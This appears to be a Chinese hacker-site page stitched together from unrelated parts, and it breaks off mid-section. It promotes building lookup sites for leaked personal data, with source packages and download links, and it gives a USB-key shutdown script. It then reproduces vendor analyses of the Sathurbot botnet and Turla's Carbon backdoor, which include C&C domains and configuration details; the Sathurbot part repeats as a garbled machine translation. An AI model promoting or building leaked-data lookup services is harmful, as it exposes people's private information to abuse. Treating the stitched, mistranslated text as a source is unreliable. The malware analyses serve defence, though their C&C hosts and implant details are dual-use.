福利来了…中国地区尽然全网封杀了社工库,因为社工库已经是属于犯罪了?那么请你们收好自己建立一个吧!!

中国骇客云社工库自从上线以来,有很多人在用…除了我们有国外服务器,也有国内版本..但是随着国内的法律一直在整合网络环境..我们相信..我们不做对不起国人的事情..中国是一个公民信息泄漏的大国?(为什么?还不是因为某些漏洞平台发布网..某些白帽子进行黑白交易所导致吗?另外中国信息泄漏已经不是什么常事..毕竟中国的黑客环境只会给他人信息泄漏造成影响)而社工库的诞生也成就了…(小小的社工技术的门槛)
我们不是黑客..我们只是网络搬用工……..黑客!!!!!!!社工库…真心为泄漏数据而感到悲哀..因为你的账户我的权限…是不是很流弊..
可以通过这些自己搭建社工库玩儿..当然记得搭建好可以做个小小的端口接入骇客云…(官方平台社工库国外上线中……….end…国内版本请期待恢复应用!)
社工库源码搜集

大概就是这个界面 13年前后的大多数社工库都是这个源码改的 包括第一代QQ群查询

asp+sqlserver 单表查询

下载地址:bamaba

变形修改版:Q群登陆查询源码(当时毛都不会写,看到bamaba源码狂改而成)

 


CNSEU的源码 原来叫97bug吧 怀念一下 好多裤子 嘻嘻

 

这个源码是直接搜索TXT文件的,无需导入数据库。简单粗暴 很多懒人使用至今..

TXT+php 自动查询

下载地址:cha.97bug.com

 


这个源码可是相当出名 上过新闻 嘿嘿

 

mysql+php 支持多表查询

Copyright:Problem

下载地址:PHP社工库源码


 

如果你喜欢社工库 你可以不知道Helen 不过你不可以不知道Acn

 

这个网站从13年开始 从闪客库(bamaba改编源码)->搜库(上图的源码)->搜云 反正改了好多名  算是开了最久的社工库了

sqlserver+php 单表查询

下载地址(搜库上图所示):www.soyun_.org源码

下载地址(这个好像比较新吧):搜云社工库网站程序源码


使用Ajax查询的社工库

↑这个是本套源码搭建后的样子 其实是一个源码 换个皮肤罢了

特点是随查随出 裤子多的话不用一直傻等着 可以看到实时结果 蛮帅的.

mysql+php 支持多表查询

Copyright:C0de(航总)

下载地址:ajax社工库


社工库.Com的源码

mysql+php 支持多表查询

Copyright:C0de(航总)

数据库:mysql

web:社工库源码


使用Sphinx查询的源码

原作者http://zone.wooyun.org/content/9377

 

Sphinx(coreseek)特点搜索速度快 导入无脑 适合懒人使用 就是配置起来费劲点 多看看文档

mysql+php+coreseek 单/多表查询

下载地址:sphinx

Copyright:Ph4nt0m


 JSP查询源码

当年随小米数据库一起流出

 

自动循环搜索全部数据库 无需配置  自动根据数据库字段显示 比较聪明

不过要修改数据库配置要反编译jar..小白绕道吧

mysql+JSP 支持多表查询

Copyright:shack2

下载地址:SGWeb (1)


SOLR查询源码

比较老牌的社工库了吧 数据量好像不大 呃..

solr我不太了解 所以不多加评论

solr+thinkphp 支持多表查询

Copyright:刑天

下载地址:


MongoDB查询源码

 

mongodb 我也不太懂 .好像是非关系型数据库吧。

这个比较大啊 作者很良心 教程环境都打包了

mongodb+php

Copyright:无解

下载地址:http://115.com/lb/5lbc9gzmnc0h


Helen匿名者社工库

其实和搜云一样 一个服务器的 界面不同而已

sqlserver+php 单表查询

下载地址:黑论社工库1

中国骇客云教你使用U盘制作进入系统的中钥匙

如今U盘容量越来越大而且价钱越来越低,因而普及率十分之高,置信大家们也动手一个。想不想用U盘作爲开启XP大门的钥匙来维护你的爱机呢?这样他人就会由于没有对应的U盘钥匙而无法开机,平安性自是大爲进步。制造办法十分复杂,也不需第三方软件,只是应用XP本身的工具一组战略,只需3步走。

第一步:先把U盘插上,然后双击翻开“我的电脑”,检查一下本人U盘在Windows XP中

所分配的盘符,我的盘符爲K,将恣意一团体文件复制到U盘的根目录中,我把一个照片放到了外面名字爲“U.JPG”。

第二步:翻开Windows XP的记事本顺序,输出一条命令:if not exist K:\u.jpg shutdown -s -f -t

3 -c”Sorry,你不是本机主人,回绝开机!”

W~$VUM7PH}NBEX_Z@OWH1_N.jpg

其中的“shutdown”既爲关机命令,“-s”爲关机的参数,“-r”爲重启,“-f”爲强迫关机,“-t”后门跟的是倒计时3秒,“-c”提示的关机阐明。本命令的意思是:假如在K盘上我不到“U.jpg”这个文件的话,就显示”Sorry,你不是本机主人,回绝开机!”,之后过3秒就自动关机。当然,假如你在第一步中复制的是“HackerXfiles.mp3”MP3文件也行,只需在相应的命令行中修正一下就可以了。然后将文本另存爲“Check.bat”。将寄存途径定位于Windows XP’的零碎盘C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup中(由于GroupPolicy文件夹默许爲隐藏,请先在“文件夹选项”中将其显示,文件的扩展名改爲bat

型,文件名可恣意改,如hackXfiles.bat。

第三步:翻开命令符,间接按Win+R,在外面输出“gpedit.msc”。找到“本地计算机”战略——“计算机配置”——“Windows设置”——“脚本(启动/关机)”,然后双击右侧中的“启动”项;在弹出的“启动属性”窗口中单击“添加”按钮,然后在弹出的“添加脚本”窗口中单击“旅游”按钮,Windows XP会自动定位于零碎盘C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup文件夹,单击迭中刚生成的Check.bat批处置文件后在单击“翻开”按钮;之后单击一次“启动”窗口中的“确定”按钮,最初封闭组战略窗口。

OK,一把完满的U盘钥匙曾经打造出来了,只需再启动XP之前将U盘插到主机上。等运转脚本时分会判别能否存在文件“U.JPG”,假如没有发现文件就会3秒后强迫关机,拿起手中的U盘赶快试一下吧!

Sathurbot: Distributed WordPress password attack HackersChina分布式WordPress密码攻击

This article sheds light on the current ecosystem of the Sathurbot backdoor trojan, in particular exposing its use of torrents as a delivery medium and its distributed brute-forcing of weak WordPress administrator accounts.

The torrent leecher

Looking to download a movie or software without paying for it? There might be associated risks. It just might happen that your favorite search engine returns links to torrents on sites that normally have nothing to do with file sharing. They may, however, run WordPress and have simply been compromised.

Some examples of search results:

Clicking on some of those links returns the pages below (notice how some even use HTTPS):

The movie subpages all lead to the same torrent file; while all the software subpages lead to another torrent file. When you begin torrenting in your favorite torrent client, you will find the file is well-seeded and thus appears legitimate. If you download the movie torrent, its content will be a file with a video extension accompanied by an apparent codec pack installer, and an explanatory text file. The software torrent contains an apparent installer executable and a small text file. The objective of both is to entice get the victim to run the executable which loads the Sathurbot DLL.

After you start the executable, you are presented with a message like this:

While you ponder your options, bad things start to happen in the background. You have just become a bot in the Sathurbot network.

Backdoor and downloader

On startup, Sathurbot retrieves its C&C with a query to DNS. The response comes as a DNS TXT record. Its hex string value is decrypted and used as the C&C domain name for status reporting, task retrieval and to get links to other malware downloads.

Sathurbot can update itself and download and start other executables. We have seen variations ofBoaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list.

The Sathurbot then reports its successful installation along with a listening port to the C&C. Periodically, it reports to the C&C that it is alive and well, waiting for additional tasks.

Web crawler

Sathurbot comes with some 5,000 plus basic generic words. These are randomly combined to form a 2-4 word phrase combination used as a query string via the Google, Bing and Yandex search engines.

From the webpages at each of those search result URLs, a random 2-4 word long text chunk is selected (this time it might be more meaningful as it is from real text) and used for the next round of search queries.

Finally, the second set of search results (up to first three pages) are harvested for domain names.

The extracted domain names are all subsequently probed for being created by the WordPress framework. The trick here is to check the response for the URL http://[domain_name]/wp-login.php.

Afterward the root index page of the domain is fetched and probed for the presence of other frameworks. Namely, they are also interested in: Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS.

Upon startup, or at certain time intervals, the harvested domains are sent to the C&C (a different domain is used than the one for the backdoor – a hardcoded one).

Distributed WordPress password attack

The client is now ready to get a list of domain access credentials (formatted aslogin:password@domain) to probe for passwords. Different bots in Sathurbot’s botnet try different login credentials for the same site. Every bot only attempts a single login per site and moves on. This design helps ensure that the bot doesn’t get its IP address blacklisted from any targeted site and can revisit it in the future.

During our testing, lists of 10,000 items to probe were returned by the C&C.

For the attack itself, the XML-RPC API of WordPress is used. Particularly the wp.getUsersBlogsAPI is abused. A typical request looks like:

The sequence of probing a number of domain credentials is illustrated in the following figure:

The response is evaluated and results posted to the C&C.

Torrent client – seeder

The bot has the libtorrent library integrated and one of the tasks is to become a seeder – a binary file is downloaded, torrent created and seeded.

The BitTorrent bootstrap

That completes the cycle from a leecher to an involuntary seeder:

Note: Not every bot in the network is performing all the functions, some are just web crawlers, some just attack the XML-RPC API, and some do both. Also, not every bot seems to be seeding a torrent.

Impact

The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks onwp.getUsersBlogs in their logs.

Through examination of logs, system artifacts and files, the botnet consists of over 20,000 infected computers and has been active since at least June 2016.

Occasionally, we have seen torrent links being sent by email as well.

Detection

Web Admins – Check for unknown subpages and/or directories on the server. If they contain any references to torrent download offers, check logs for attacks and possible backdoors.

Users – Run Wireshark with the filter http.request with no web browser open to see too many requests like GET /wp-login.php and/or POST /xmlrpc.php. Alternatively, check for files or registry entries listed in the IoC section, below.

ESET users are protected from this threat on multiple levels.

Removal

Web Admins – Change passwords, remove subpages not belonging to site, optionally wipe and restore the site from a backup.

Users – Using a third-party file manager find the suspect .DLL (note that the files and directories have the hidden attribute set), open Process Explorer or Task Manager, kill explorer.exeand/or rundll32.exe, delete (quarantine) the affected .DLL, reboot.

Note: this will remove Sathurbot only, and not any other malware it may have also downloaded.

Alternatively, consider a comprehensive anti-malware product, or at least an online scanner.

Prevention

Web Admins – Should the normal functioning of the website not require the XML-RPC API, you are advised to disable it and use complex passwords.

Users – Avoid both running executables downloaded from sources other than those of respected developers, and downloading files from sites not designed primarily as file-sharing sites.

IoCs

Currently, we have observed Sathurbot installing to:

\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll

\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll

\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll

\Users\*****\AppData\Local\Microsoft\Protect\protecthost.dll

Runs in the context of rundll32.exe or explorer.exe process and locks files and registry keys from editing. It is present in both x32 and x64 bit versions in the installer.

Subfolders to the above (contain the seeded files by torrent)
\SecurityCache\cache\resume\
\SecurityCache\cache\rules\
\SecurityCache\data\
\SecurityCache\zepplauncher.mif – contains the DHT nodes
\temp\

%appdata%\SYSHashTable\ – contains folders representing the hashes of visited domains
%appdata%\SYSHashTable\SyshashInfo.db – collection of interesting domains found incl. framework info

Samples (SHA-1)

Installers:
2D9AFB96EAFBCFCDD8E1CAFF492BFCF0488E6B8C
3D08D416284E9C9C4FF36F474C9D46F3601652D5
512789C90D76785C061A88A0B92F5F5778E80BAA
735C8A382400C985B85D27C67369EF4E7ED30135
798755794D124D00EAB65653442957614400D71D
4F52A4A5BA897F055393174B3DFCA1D022416B88
8EDFE9667ECFE469BF88A5A5EBBB9A75334A48B9
5B45731C6BBA7359770D99124183E8D80548B64F
C0F8C75110123BEE7DB5CA3503C3F5A50A1A055E
C8A514B0309BCDE73F7E28EB72EB6CB3ABE24FDD
AF1AE760F055120CA658D20A21E4B14244BC047D
A1C515B965FB0DED176A0F38C811E6423D9FFD86
B9067085701B206D2AC180E82D5BC68EDD584A8B
77625ADEA198F6756E5D7C613811A5864E9874EA
Sathurbot dll:
F3A265D4209F3E7E6013CA4524E02D19AAC951D9
0EA717E23D70040011BD8BD0BF1FFAAF071DA22C
2381686708174BC5DE2F04704491B331EE9D630B
2B942C57CEE7E2E984EE10F4173F472DB6C15256
2F4FAA5CB5703004CA68865D8D5DACBA35402DE4
4EBC55FDFB4A1DD22E7D329E6EF8C7F27E650B34
0EF3ECD8597CE799715233C8BA52D677E98ABDFD
0307BBAC69C54488C124235449675A0F4B0CCEFA
149518FB8DE56A34B1CA2D66731126CF197958C3
3809C52343A8F3A3597898C9106BA72DB7F6A3CB
4A69B1B1191C9E4BC465F72D76FE45C77A5CB4B0
5CCDB41A34ADA906635CE2EE1AB4615A1AFCB2F2
6C03F7A9F826BB3A75C3946E3EF75BFC19E14683
8DA0DC48AFB8D2D1E9F485029D1800173774C837
AC7D8140A8527B8F7EE6788C128AFF4CA92E82C2
E1286F8AE85EB8BD1B6BE4684E3C9E4B88D300DB

Additional payloads:

C439FC24CAFA3C8008FC01B6F4C39F6010CE32B6
ABA9578AB2588758AD34C3955C06CD2765BFDF68
DFB48B12823E23C52DAE03EE4F7B9B5C9E9FDF92
FAFF56D95F06FE4DA8ED433985FA2E91B94EE9AD
B728EB975CF7FDD484FCBCFFE1D75E4F668F842F
59189ABE0C6C73B66944795A2EF5A2884715772E
C6BDB2DC6A48136E208279587EFA6A9DD70A3FAA
BEAA3159DBE46172FC79E8732C00F286B120E720
5ED0DF92174B62002E6203801A58FE665EF17B76
70DFABA5F98B5EBC471896B792BBEF4DB4B07C53
10F92B962D76E938C154DC7CBD7DEFE97498AB1E
426F9542D0DDA1C0FF8D2F4CB0D74A1594967636
AA2176834BA49B6A9901013645C84C64478AA931
1C274E18A8CAD814E0094C63405D461E815D736A
61384C0F690036E808F5988B5F06FD2D07A87454
F32D42EF1E5ED221D478CFAA1A76BB2E9E93A0C1
594E098E9787EB8B7C13243D0EDF6812F34D0FBA
1AAFEBAA11424B65ED48C68CDEED88F34136B8DC
BA4F20D1C821B81BC324416324BA7605953D0605
E08C36B122C5E8E561A4DE733EBB8F6AE3172BF0
7748115AF04F9FD477041CB40B4C5048464CE43E
3065C1098B5C3FC15C783CDDE38A14DFA2E005E4
FA25E212F77A06C0B7A62C6B7C86643660B24DDA
FADADFFA8F5351794BC5DCABE301157A4A2EBBCF
B0692A03D79CD2EA7622D3A784A1711ADAABEE8D
9411991DCF1B4ED9002D9381083DE714866AEA00

Associated domains

DNS:
zeusgreekmaster.xyz
apollogreekmaster.xyz

C&C:
jhkabmasdjm2asdu7gjaysgddasd.xyz
boomboomboomway.xyz
mrslavelemmiwinkstwo.xyz
uromatalieslave.space
newforceddomainisherenow.club
justanotherforcedomain.xyz
artemisoslave.xyz
asxdq2saxadsdawdq2sasaddfsdfsf4ssfuckk.xyz
kjaskdhkaudhsnkq3uhaksjndkud3asds.xyz
badaboommail.xyz

Torrent trackers:
badaboomsharetracker.xyz
webdatasourcetraffic.xyz
sharetorrentsonlinetracker.xyz
webtrafficsuccess.xyz

Registry values

You may need to use a third-party tool, as Windows Regedit might not even show these:

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\explorer.exe|Name=Windows Explorer|”

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\system32\\rundll32.exe|Name=Windows host process (Rundll32)|”

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0TheftProtectionDll = {GUID1}
HKLM\SOFTWARE\Classes\CLSID\{GUID1} = “Windows Theft Protection”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32 = “C:\\ProgramData\\Microsoft\\Performance\\TheftProtection\\TheftProtection.dll”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32\ThreadingModel = “Apartment”

HKLM\SOFTWARE\Classes\CLSID\{GUID2}

The {GUID2} entries are variable across samples and have 6 char long subkeys, content is binary type and encrypted – used to store variables, temporary values and settings, IP’s, C&C’s, UID

e.g. {GUID2} entries look like

HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000003
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000009
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000011
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000008
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000007
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000004
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000010
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00020001

BENWEN揭示了当前生态系统sathurbot后门木马,特别是在其使用的种子作为输送介质及其分布式蛮弱的WordPress的管理员帐户的强迫。HACKERSCHINA

torrent下载者

想不付钱就下载一部电影或软件?可能会有相关的风险。它很可能会发生,你最喜欢的搜索引擎返回到正常无关的文件共享网站Torrent链接。他们可以,但是,运行WordPress和已经被攻破。

一些搜索结果的例子:

点击那些链接返回以下页面(注意,有的甚至使用HTTPS):

这部电影的子页面都导致相同的torrent文件;而所有软件的子页面导致另一个torrent文件。当你开始在你的喜爱torrenting BT客户端,你会发现文件是好种子,从而出现合法。如果你下载电影的洪流,其内容将与视频延长伴有明显的编解码器包的安装程序文件,并解释文本文件。该软件包含了一个明显的安装程序可执行文件和洪流的一个小的文本文件。两者的目的都是让让受害者运行可执行文件加载DLL的sathurbot。

在你开始执行,你会有这样的消息:

当你思考你的选择,不好的事情开始发生在背景。你刚刚成为BOTsathurbot网络

后门和下载

在启动时,sathurbot检索与C的一个查询的DNS。该反应是一个DNS的TXT等记录。它的字符串值解密作为C & C状态报告域名,任务检索到其他恶意软件下载链接。

sathurbot可以自我更新和下载和启动其他可执行文件。我们已经看到的变化boaxxeKovterfleercivet,但这不一定是一个详尽的列表。

的sathurbot然后报告其成功安装在一个监听端口的C&C的定期报告到C和C,它是活得很好,等待额外的任务。

网络爬虫

sathurbot附带一些5000再加上基本的通用词。这些都是随机组合形成2-4字词组合作为通过谷歌查询字符串,Bing搜索引擎Yandex。

从网页在每一个这样的搜索结果网址,随机2-4词长文本块选择(这次可能是更有意义的因为它是从真实文本)和用于搜索查询下一轮。

最后,搜索结果的第二集(第三页)收获的域名。

提取的域名都是随后探讨由WordPress框架创建。这里的诀窍是检查响应的URLhttp://〔〕/wp-login.php _名字域

随后该域的根目录页取了其他框架的存在。换句话说,他们也感兴趣:Drupal、Joomla,php-nuke,phpfox,和dedecms。

在启动时,或在一定的时间间隔,收获的域发送到C和C(一个不同的域是用比借壳–硬编码的一个)。

分布式的WordPress的密码攻击

客户现在可以得到一个列表域访问凭据(格式为登录名:密码@域)探讨密码。在Sathurbot的僵尸网络不同的机器人尝试不同的登录凭据相同的网站。每个机器人只尝试每网站和移动单点登录。这种设计有助于确保BOT没有IP地址被列入黑名单的任何目标网站,可以重温它的未来。

在我们的测试中,探讨10000项列表是由C和C返回

对于攻击本身的XML-RPC APIWordPress是使用。特别是wp.getusersblogsAPI的滥用。一个典型的请求看起来像:

探索一个数域凭据如下图所示的序列:

响应进行评估和结果发布到C和C

洪流客户端,播种机

BOT具有libtorrent图书馆集成和任务之一是成为一个播种机–二进制文件下载、创建和种子的种子。

BitTorrent的引导

完成周期从吸血一个非自愿的播种机

注:在网络不是每个BOT是执行所有的功能,有些只是网络爬虫,有的只是攻击XML-RPC API,有的做。而且,并不是每一个BOT似乎是播种的洪流。

影响

上述的尝试wp-login.php /从众多的用户,甚至网站不主机WordPress的,是sathurbot的直接影响。许多网站管理员观察和想知道为什么会发生。此外,WordPress网站可以看到潜在的攻击wp.getusersblogs在他们的日志

通过检查日志,系统构件和文件,僵尸网络由超过20000受感染的计算机,至少从六月2016活跃。

偶尔,我们看到Torrent链接通过电子邮件发送以及。

检测

网络管理员–检查服务器上的未知的子页面和/或目录。如果他们有任何引用洪流下载提供,检查和可能的后门攻击日志。

用户–运行Wireshark的滤波器http.request没有浏览器打开看到太多的要求,喜欢wp-login.php /和/或邮政/ xmlrpc.php。另外,检查文件或注册表项在国际奥委会部分上市,下面。

ESET用户免受这一威胁的多层次。

搬家公司

网络管理员–修改密码,删除不属于网站的子页面,随意擦拭,从备份中恢复的网站。

用户–使用第三方的文件管理器找到嫌犯。DLL(注意,文件和目录都有隐藏属性设置),打开进程管理器、任务管理器,杀死explorer.exe和/或rundll32.exe,删除(检疫)的影响。DLL,启动。

注意:这将删除sathurbot而已,并没有任何其他恶意软件可能还下载了。

另外,考虑全面的反恶意软件产品,或者至少是一个在线扫描

预防

网络管理员–应该正常运作的网站不需要XML-RPC API,建议您禁用它并使用复杂的密码。

用户–避免运行的可执行文件从其他来源比尊重开发者下载,并不是设计作为主要的文件共享网站的站点下载文件。

IOC

目前,我们已经观察到sathurbot安装:

programdata \ Microsoft \ \ \ \ performancemonitor.dll性能监视器

\下\微软\ \ \ theftprotection.dll theftprotection性能

\下\微软\ \ \ securityhelper.dll性能监控

\用户\ ***** \ AppData \地方\微软\保护\ protecthost.dll

运行中rundll32.exe或Explorer.exe进程锁和编辑文件和注册表键。它是在安装x32和x64位版本目前。

子文件夹,以上(含种子文件的洪流)
securitycache \ \ \ \缓存摘要
\ \ \ \ securitycache缓存规则
securitycache日期\ \ \
“securitycache \ zepplauncher.mif–包含DHT节点
\温度\

syshashtable %APPDATA%directory \ \–包含表示哈希文件夹访问域
syshashtable %APPDATA%directory \ \ syshashinfo.db–收集有趣的领域,包括框架的信息

Carbon Paper: Peering into Turla’s second stage backdoor窥视Turla的第二阶段的后门

The Turla espionage group has been targeting various institutions for many years. Recently, we found several new versions of Carbon, a second stage backdoor in the Turla group arsenal. Last year, a technical analysis of this component was made by Swiss GovCERT.ch as part of their report detailing the attack that a defense firm owned by the Swiss government, RUAG, suffered in the past.

This blog post highlights the technical innovations that we found in the latest versions of Carbon we have discovered.

Looking at the different versions numbers of Carbon we have, it is clear that it is still under active development. Through the internal versions embedded in the code, we see the new versions are pushed out regularly. The group is also known to change its tools once they are exposed. As such, we have seen that between two major versions, mutexes and file names are being changed.

Infection vectors

The Turla group is known to be painstaking and work in stages, first doing reconnaissance on their victims’ systems before deploying their most sophisticated tools such as Carbon.

A classic Carbon compromise chain starts with a user receiving a spearphishing email or visiting a previously compromised website, typically one that the user visits regularly — a technique known as a watering hole attack.

After a successful attack, a first stage backdoor — such as Tavdig[1]or Skipper[2]— is installed on the user machine. Once the reconnaissance phase is over, a second stage backdoor, like Carbon, is installed on key systems.

Technical analysis

Carbon is a sophisticated backdoor used to steal sensitive information from targets of interest by the Turla group.

This malware shares some similarities with “Uroburos”[3], a rootkit used by the same group. The most relevant resemblance is the communication framework. Indeed, both of them provide communication channels between different malware components. The communication objects are implemented in the same way, the structures and vtables look identical except that there are fewer communication channels provided in Carbon. Indeed, Carbon might be a “lite” version of Uroburos (without kernel components and without exploits).

For Turla group to decide to install Carbon on a system, a (stage 1) recognition tool is usually delivered first to the target: this tool collects several pieces of information about the victim’s machine and its network (through Tavdig or Skipper for example). If the target is considered interesting enough, it will receive more sophisticated malware (such as Carbon or Uroburos).

Global architecture

The Carbon framework consists of:

  • a dropper that installs the carbon components and its configuration file
  • a component that communicates with the C&C
  • an orchestrator that handles the tasks, dispatches them to other computers on the network and injects into a legitimate process the DLL that communicates with the C&C
  • a loader that executes the orchestrator

Carbon Dating

The orchestrator and the injected library have their own development branch.

Thanks to the compilation dates and the internal versions numbers hardcoded in the PE files, we might have the following timeline:

Table 1 – Carbon development timeline

Carbon files

The files from the Carbon framework can have different names depending on the version but they all keep the same internal name (from the metadata) regardless of the version:

  • the dropper: “SERVICE.EXE”
  • the loader: “SERVICE.DLL” or “KmSvc.DLL”
  • the orchestrator: “MSIMGHLP.DLL”
  • the injected library: “MSXIML.DLL”

Each of these files exist in 32bit and in 64bit versions.

Working directory

Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware’s behavior. The contents of the majority of these files are encrypted with the CAST-128 algorithm[4].

A base working directory will contain the files/folders related to Carbon. This directory is chosen randomly among the folders in %ProgramFiles% but excluding “WindowsApps”.

The filenames are hardcoded in the orchestrator. The same names are used in the 3.7x+ branch. Because the injected library accesses the same files as the orchestrator, it is another easy way to link a library version and an orchestrator.

Carbon 3.7x files tree view:
\%carbon_working_folder\%   // base folder├── 0208 // tasks results and logs files│   ├── C_56743.NLS // contains list of files to send to the C&C server, this file is neither compressed nor encrypted├── asmcerts.rs├── getcerts.rs├── miniport.dat  // configuration file├── msximl.dll    // injected library (x32)├── Nls // contains tasks (commands to be executed or PE file) and their configuration files│   ├── a67ncodc.ax  // tasks to be executed by the orchestrator│   ├── b9s3coff.ax  // tasks to be executed by the injected library├── System   // plugins folder│   ├── bootmisc.sdi // not used├── qavscr.dat    // error log├── vndkrmn.dic   // log└── ximarsh.dll   // injected library (x64)

Since version 3.80, all filenames have changed.

Carbon 3.8x files tree view:
\carbon_working_folder\%   // base folder├── 0409  // contains tasks (commands to be executed or PE file) and their configuration files│   ├── cifrado.xml    // tasks to be executed by the injected library│   ├── encodebase.inf // tasks to be executed by the orchestrator├── 1033 // tasks results and logs files│   ├── dsntype.gif // contains list of files to send to the C&C server, this file is neither compressed nor encrypted├── en-US  // plugins folder│   ├── asmlang.jpg // not used├── fsbootfail.dat  // error log├── mkfieldsec.dll  // injected library (x32)├── preinsta.jpg    // log├── wkstrend.xml    // configuration file├── xmlrts.png└── zcerterror.png

File access

In the case of the majority of the files from the Carbon working folder, when one is accessed by the malware, the following steps are taken:

  • a specific mutex is used to ensure its exclusive access.
  • the file is decrypted (CAST-128)
  • when the operations on the file are done, the file is reencrypted (CAST-128)
  • the mutex is released

Mutexes

The following mutexes are created by the orchestrator in Carbon 3.7x:

  • “Global\\MSCTF.Shared.MUTEX.ZRX” (used to ensure exclusive access to “vndkrmn.dic”)
  • “Global\\DBWindowsBase” (used to ensure exclusive access to “C_56743.NLS”)
  • “Global\\IEFrame.LockDefaultBrowser” (used to ensure exclusive access to “b9s3coss.ax”)
  • “Global\\WinSta0_DesktopSessionMut” (used to ensure exclusive access to “a67ncodc.ax”)
  • “Global\{5FA3BC02-920F-D42A-68BC-04F2A75BE158}” (used to ensure exclusive access to new files created in “Nls” folder)
  • “Global\\SENS.LockStarterCacheResource” (used to ensure exclusive access to “miniport.dat”)
  • “Global\\ShimSharedMemoryLock” (used to ensure exclusive access to “asmcerts.rs”)

In carbon 3.8x, the filenames and the mutex names have changed:

  • “Global\\Stack.Trace.Multi.TOS” (used to ensure exclusive access to “preinsta.jpg”)
  • “Global\\TrackFirleSystemIntegrity” (used to ensure exclusive access to “dsntype.gif”)
  • “Global\\BitswapNormalOps” (used to ensure exclusive access to “cifrado.xml”)
  • “Global\\VB_crypto_library_backend” (used to ensure exclusive access to “encodebase.inf”)
  • “Global\{E41B9AF4-B4E1-063B-7352-4AB6E8F355C7}” (used to ensure exclusive access to new files created in “0409” folder)
  • “Global\\Exchange.Properties.B” (used to ensure exclusive access to “wkstrend.xml”)
  • “Global\\DatabaseTransSecurityLock” (used to ensure exclusive access to “xmlrts.png”)

These mutexes are also used in the injected dll to ensure that the orchestrator has been executed.

Configuration File

The configuration file affects the malware’s behavior. The file format is similar to “inf” files used by Windows. It contains among others:

  • an “object_id” that is a unique uuid used to identify the victim, when the value is not set in the file, it is generated randomly by the malware
  • a list of processes into which code is injected (iproc)
  • the frequency and time for task execution / backup logs / connection to the C&C ([TIME])
  • the IP addresses of other computers on the network ([CW_LOCAL])
  • the C&C server addresses ([CW_INET])
  • the named pipes used to communicate with the injected library and with the other computers ([TRANSPORT])

This file might be updated later. Indeed, in the communication library, some cryptographic keys are used to encrypt/decrypt data and these keys are retrieved from a section [CRYPTO] in the configuration file that does not exist when the file is dropped from the loader resources.

Carbon 3.77 configuration file:
[NAME]object_id=iproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exeex = #,netscape.exe,mozilla.exe,adobeupdater.exe,chrome.exe[TIME]user_winmin = 1800000user_winmax = 3600000sys_winmin = 3600000sys_winmax = 3700000task_min = 20000task_max = 30000checkmin = 60000checkmax = 70000logmin =  60000logmax = 120000lastconnect=111timestop=active_con = 900000time2task=3600000[CW_LOCAL]quantity = 0[CW_INET]quantity = 3address1 = doctorshand.org:80:/wp-content/about/address2 = www.lasac.eu:80:/credit_payment/url/address3 = www.shoppingexpert.it:80:/wp-content/gallery/[TRANSPORT]system_pipe = comnapspstatus = yesadaptable = no[DHCP]server = 135[LOG]logperiod = 7200[WORKDATA]run_task=run_task_system=

Logfile

The Carbon framework includes a logfile that is used to log actions performed by the malware and information on the system that can be useful to the malware operator (for example if an analysis tool such as WireShark is running on the machine).

The log’s format has not changed since Carbon 3.71:

  • Date|Time|Object-Id|Source|Message
example
[LOG]start=120/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|OPER|New object ID generated '8hTdJtUBB57ieReZAOSgUYacts'|20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|ST|3/81|0|20/02/17|12:48:24|8hTdJtUBB57ieReZAOSgUYacts|s|START OK

This file is periodically backed up and sent to the C&C.

Dropper

The dropper is the only executable that is not a DLL. It is the first PE file to be executed: it is used to extract the other components from its resources.

The PE files that are used to load the main components are extracted into the Windows system directory while the orchestrator, the library used to communicate with the C&C and the configuration file are extracted into the Carbon working directory.

A new section is appended into a random “.inf” file from %SystemRoot%\INF. The section’s name is the volume serial disk number of the compromised machine and a value “root” is created with the chosen Carbon working directory.

Example:
[5049654F]root="C:\Program Files\Windows Portable Devices"

Loader

This part of the component is used to load the orchestrator.

